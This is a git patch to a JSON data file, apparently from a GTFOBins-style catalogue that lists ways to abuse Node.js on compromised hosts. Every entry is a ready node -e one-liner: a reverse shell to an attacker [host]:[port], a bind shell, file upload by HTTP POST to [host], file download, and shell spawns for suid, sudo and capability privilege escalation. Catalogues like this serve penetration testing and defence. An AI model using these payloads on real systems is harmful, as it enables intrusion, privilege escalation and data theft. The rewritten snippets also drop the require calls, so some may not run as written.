From 199b4df1cdf66f23be2510696ca6e1e99d977ae7 Mon Sep 17 00:00:00 2001
From: "Mr. Robot" <t0thkr1s@icloud.com>
Date: Sun, 21 Feb 2021 11:46:14 +0100
Subject: [PATCH] update node.js data source

---
 data/node.json | 36 +++++++++++++++++++++++++++++-------
 1 file changed, 29 insertions(+), 7 deletions(-)

diff --git a/data/node.json b/data/node.json
index 66156b6..416cbf6 100644
--- a/data/node.json
+++ b/data/node.json
@@ -2,35 +2,57 @@
   "functions": {
     "shell": [
       {
-        "code": "node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+        "code": "node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "node -e 'fs.writeFileSync(\"file_to_write\", \"DATA\")'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "node -e 'process.stdout.write(fs.readFileSync(\"/bin/ls\"))'"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "node -e 'http.get([host], res => res.pipe(fs.createWriteStream([file])))'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send a local file via HTTP POST request.",
+        "code": "node -e 'fs.createReadStream([file]).pipe(http.request([host]))'\n"
       }
     ],
     "reverse-shell": [
       {
         "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
-        "code": "node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nnet.connect([port], \"[host]\", function () {\n  this.pipe(sh.stdin);\n  sh.stdout.pipe(this);\n  sh.stderr.pipe(this);\n});'\n"
+        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.connect([port], [host], function () {\n  this.pipe(sh.stdin);\n  sh.stdout.pipe(this);\n  sh.stderr.pipe(this);\n})'\n"
       }
     ],
     "bind-shell": [
       {
         "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
-        "code": "node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").createServer(function (client) {\n  client.pipe(sh.stdin);\n  sh.stdout.pipe(client);\n  sh.stderr.pipe(client);\n}).listen([port]);'\n"
+        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.createServer(function (client) {\n  client.pipe(sh.stdin);\n  sh.stdout.pipe(client);\n  sh.stderr.pipe(client);\n}).listen([port])'\n"
       }
     ],
     "suid": [
       {
-        "code": "./node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]});'\n"
+        "code": "./node -e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+        "code": "sudo node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
       }
     ],
     "capabilities": [
       {
-        "code": "./node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]});'\n"
+        "code": "./node -e 'process.setuid(0); child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
       }
     ]
   }
-}
\ No newline at end of file
+}